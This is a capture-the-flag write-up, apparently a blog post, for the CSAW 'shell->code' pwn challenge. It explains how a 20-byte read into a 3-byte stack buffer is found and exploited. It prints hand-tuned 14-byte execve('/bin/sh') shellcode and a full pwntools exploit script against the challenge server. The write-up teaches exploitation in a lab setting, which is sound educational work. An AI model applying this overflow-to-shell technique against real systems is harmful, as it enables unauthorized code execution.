CSAW Write-Up: shell->code

It's been a few weeks since me and the Mechasheep played CSAW, but that doesn't mean there's nothing left to write about.

The first and easiest pwn challenge I encountered during the competition was called shell->code, a baby-class challenge. The simplicity of this challenge means I can actually focus on capturing my process and workflow, which should be especially useful to those new to the world of exploitation.

Overview

After reading the flavor-text,

Pwn
shell->code
Linked lists are great! They let you chain pieces of data together.

nc pwn.chal.csaw.io 9005

I grabbed the binary and dug right in. There's some setup code that isn't really relevant, but the code eventually calls a function called nononode(). This is where the interesting behavior starts:

What it does isn't terribly obvious, so let me lay out the important details. The code is essentially working with a structure which looks something like this:

struct node
{
    node* next;
    uint8_t text[15];
};

Specifically, there are two instances of this structures on the stack. The first is at rbp - 0x20 and the second is at rbp - 0x40. We can actually go to the type view in Binary Ninja, define this structure, and see the types in the disasm.

Note: there are multiple labels on the bottom right of the binja UI. If you click the one that typically says either Graph or Linear Disassembly, you'll find an option to go the the Types view. Here, you can define C-style types which can augment disasm. I don't know why this isn't documented better or more obvious.

With the structure defined, we can press y on a variable in the disasm to set it's type and n to set it's name. With that done, we can press i a few times to cycle through the different representations of the code until we find one that reveals new information at a glance. Here's the same function again:

Now the behavior is easy to see: the code links the nodes with node_1.next = node_2, then fills the text member of these nodes using two calls to readline() with a length of 15, specified on esi as 0xF.

The readline() function isn't particularly interesting, but let's look at it anyways:

This code calls the getline() function. This call allocates a buffer of suitable length and copies a line into that buffer from stdin. Once the call returns, the code uses strncpy() to safely copy the line into the 15-byte output buffer, stored at var_20

Note: The allocation happens because rdi points to a null pointer. If rdi pointed to a buffer, it would skip allocation and read into the existing buffer.

Okay, let's take step back. Since readline() is called on each node, we can have a payload which is up to 30 bytes, fragmented into two 15-byte chunks.

Now, there's two more things that happen before nononode() is done. First, it leaks the address of node_2 with a call to printNode():

Then, it calls goodbye() to wrap up:

Note: this is a good place to talk about thinking like a CTFer. The more you play, the more you will develop a sense for what you'll find where.
In this case, we can be almost certain that the main bug doesn't happen until after printNode(), as that's where the leak is. The leak will differ across executions, so it is reasonable to expect it will happen before we're supposed to throw an exploit; otherwise it's not useful. Since goodbye() is the only remaining code, we know that's exactly where to look for a bug.

This asks for initials, reads them into a 3-byte buffer, and says goodbye %s with initials as a format parameter. This might seem innocuous to some people; but we, the attackers, can clearly see the 20-byte read into the 3-byte stack buffer. Uh-oh.

Here's a representation of the 20 bytes we have access to:

struct stackbuf // no alignment padding, aight?
{
    uint8_t initials[3];
    void* old_rbp;
    void* ret_addr;
    uint8_t some_byte_in_previous_frame;
};

We control ret_addr—the address which the RETN will jump to upon completetion—which means we can cause execution to continue at an arbitrary address. When that happens, rsp will be valid for the nononode() frame, meaning we can use rsp-relative calculations in our fragmented payloads to reference one another; this is much more space efficient than hard-coding addresses calculated from the leak. The leak still has it's purpose, however: it allows us to calculate the value we put into ret_addr. Because the stack is executable, this is enough to pwn the challenge. We simply need to make the payload fit.

Fragmentsploit

Note: when I wrote my exploit, I thought the 15-byte limit was inclusive of the null terminator. This is wrong, and the shellcode can be 15 bytes. However, since I solved it with 14, let's pretend that's the limit and show how I got there. For fun!

Typically, /bin/sh shellcode for x64 is around 25-ish bytes. We have enough space for this, as long as the tendons of our payload don't exceed 5 bytes. Instead of throwing a final payload at you cold-turkey, let's talk about what's needed to pop a shell. A syscall instruction with a call number of 59 on rax triggers execve(). This expects some parameters:

  • rdi should point to the file to execute
  • rsi should point to an array of char*s which comprise the command line arguments. These are tailed by a NULL pointer.

Here's what this means for us (let's pretend 0xDEADBEEF points to /bin/sh, since we want to pop a shell):

  • rdi should point be 0xDEADBEEF
  • rsi should point to the array [0xDEADFBEEF, NULL]

Okay, it seems like we can put /bin/sh into node_2.text and, with some finesse, fit the entirety of the shellcode into node_1.text. Let's generalize the shellcode:

  • First, we point rdi to node_1.text
  • Then, we create the command line array on the stack, something like PUSH 0 ; PUSH RDI. This is backwards because the stack grows towards 0x00
  • Next, we point rsi at this on-stack array
  • And, finally, we set rax to 59 and trigger the syscall instruction

Now, to save space, we need to use a few tricks. As mentioned before, an rsp-relative LEA saves us bytes when pointing to /bin/sh. We can also optimize the MOV RAX, 59 by using MOV AL, 59, giving us clean access to the single-byte portion of rax that we need.

If we front-pad /bin/sh to fall at the end of node_2.text, here's what the shellcode looks like:

0:  48 8D 7C 24 10          LEA    RDI, [RSP+0x10]
5:  6A 00                   PUSH   0x0
7:  57                      PUSH   RDI
8:  48 89 E6                MOV    RSI, RSP
B:  B0 3B                   MOV    AL, 59
D:  0F 05                   SYSCALL

15 bytes. Just barely too big.

Before we try to trim the length, let's talk about the LEA RDI, [RSP+0x10] and why it works. When calling nononode(), the frame is set up so that rsp is pointing to rbp - 0x40. We know this to be node_2. The first 8 bytes are node_2.next and the following 8 will hold the front-padding before the /bin/sh string. This means we need to reach 16—hex 0x10—bytes into node_2 to hit the string.

Now back to optmization. We've covered nearly everything, PUSH 0 being the exception. Pushing a register would save us a byte, but zeroing a register requires a XOR R64, R64:

0:  48 8D 7C 24 10          LEA    RDI, [RSP+0x10]
5:  48 31 F6                XOR    RSI, RSI
8:  56                      PUSH   RSI
9:  57                      PUSH   RDI
A:  48 89 E6                MOV    RSI, RSP
D:  B0 3B                   MOV    AL, 59
F:  0F 05                   SYSCALL

Of course, this is even longer: 17 bytes. The XOR accounts for 3 of those bytes, though. The idea is to ditch it, which would put us right at the threshold of 14 bytes. Let's see if we can get a register holding 0 for free.

First, let's start debugging with gdb ./shellpointcode. Then, let's set a breakpoint on the RETN in goodbye() with b *goodbye+70 and use r to begin execution. Next, let's just provide whatever arbitrary input we feel like, playing by the rules, until we hit the breakpoint. Now, let's type info registers to see what we've got:

We notice rbx is 0 at this point. ggwp. We can craft our final shellcode:

0:  48 8D 7C 24 10          LEA    RDI, [RSP+0x10]
5:  53                      PUSH   RBX
6:  57                      PUSH   RDI
7:  48 89 E6                MOV    RSI, RSP
A:  B0 3B                   MOV    AL, 59
C:  0F 05                   SYSCALL

14 bytes; it makes the cut. Now, let's see if it works.

Pwnthon

Using the pwntools python module, we can write a pretty clean exploitation script which can work on both local and remote instances of the challenge. Let's set up the boilerplate:

from pwn import *
import struct

context(arch='amd64', os='linux') # needed for asm() func to work

local_info = ['./shellpointcode']
remote_info = ['pwn.chal.csaw.io', 9005]

libc_path = ''
if (args.REMOTE):
	io = remote(remote_info[0], remote_info[1])
else:
	io = process(local_info[0], raw=False)
	raw_input() # opportunity to attach gdb

Now, let's send the shellcode as our first line. We can wait until we see the character :, since the challenge prints that before calling readline():

shellcode = """
LEA RDI, [RSP+16]
PUSH RBX
PUSH RDI
MOV RSI, RSP
MOV AL, 59
SYSCALL
"""

io.recvuntil(":")
io.sendline(asm(shellcode))

Next, let's front-pad /bin/sh and send it as node_2.text. It's 8 bytes, since we need a null-term, so we must lead with 8 to fill the buffer:

io.recvuntil(":")
io.sendline('.' * 8 + '/bin/sh\x00')

Note: we could have just as easily not padded this, or swapped the positions of the string and shellcode, or many other things. The reasoning for doing it this specific way was arbitrary.

Continuing, let's parse the leak. We know it's a hexadecimal number prefixed with 0x and followed by a newline:

leak = io.recvuntil("?")
idx = leak.find("0x")
leak = int(leak[idx+2:leak.find("\n", idx)], 16)
print("%x" % leak)

Now, the shellcode is in node_1.text, which is at (rbp - 0x20) + 8. The leak points to node_2, which is at rbp - 0x40. If we simplify, rbp cancels out and we're left with (-0x20) + 8 and -0x40. The difference—or the offset of our shellcode from leak—is 0x28:

shelladr = leak + 0x28 # ((-0x20) + 8) - (-0x40)

Finally, we can smash the stack. We need to align the return address because of the 3-byte initials, hence the leading "aaa":

io.sendline("aaa" + p64(shelladr) + p64(shelladr) + p64(0))

Let's top it off by giving us an interactive interface with our shell:

io.interactive()

Homework?

If you want to practice on this challenge, I've got some fun things to try:

  • Get it working without padding before /bin/sh
  • Swap the nodes which hold the shellcode and the string
  • Try to shorten the shellcode even further
  • Try to solve it using ROP

As of writing, the challenge can still be grabbed here. If the link is dead, search for "CSAW 2018"; they're known to keep their challenges online for quite a while.

Flag Secured

I think this challenge is perfect for cutting teeth, and I hope my kinda tutorial-style write-up did it justice. Let me know what you think of the post in the comments, and feel free to ask questions. I'll see you next time!